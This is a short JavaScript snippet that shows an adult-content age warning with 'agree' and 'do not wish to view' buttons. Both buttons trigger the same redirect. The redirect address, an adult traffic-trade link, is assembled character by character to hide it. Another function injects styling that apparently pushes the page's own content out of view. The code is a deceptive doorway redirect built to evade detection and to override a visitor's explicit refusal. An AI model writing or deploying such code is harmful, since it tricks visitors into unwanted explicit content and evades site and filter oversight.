function show_warning()
{
  var warning_html = '<tr><td align="center" style="padding-top: 20px;"><table cellpadding="0" cellspacing="0" style="width: 450px"><tr><td style="text-align: justify; font-size: 16px; line-height: 21px; color: #555555"><strong>Sexual Content Warning!</strong> You are about to view a page that contains sexual content. Please click on the button below to verify that you are at least 18 years of age and consent to viewing sexual material.</td></tr><tr><td style="padding-top: 20px;"><img class="btn" onclick="go();" src="iamagree.gif" width="477" height="27" alt="I am over 18 and agree to the viewing of sexually explicit material" title="I am over 18 and agree to the viewing of sexually explicit material" border="0" /></a></td></tr><tr><td style="padding-top: 20px;"><img class="btn" onclick="go();" src="donotwish.gif" width="477" height="27" alt="I do not wish to view this content" title="I do not wish to view this content" border="0" /></a></td></tr></table></td></tr>';
  document.write(warning_html);
}

function correct_styles()
{
  var _class1 = 'cpanel';
  var _class2 = 'lpanel'
  if (_class1.length > 0) {document.write('<style type="text/css">.'+_class1+' {padding-top: '+String(500+500)+'px;} .'+_class2+'{vertical-align: bottom;}</style>');}
}

function generate_url()
{
  // tag variable must be defined in page code
  var slash = '/';
  var qu = '?';
  var amp = '&';
  var dot = '.';
  var eq = '=';
  var t = 't';
  var w = 'w';
  var q = 'q';
  var a = 'xx';
  var c = 'xangel18';
  var e = 'h' + t + t + 'p';
  var url = e + ':' + slash + slash + a + c + dot + 'com' + slash + t + slash + 'go' + dot + 'p' + 'hp' + qu + 'sid' + eq + '7' + amp + q + eq + tag;
  return url;  
}

function go()
{
  document.location = generate_url();
}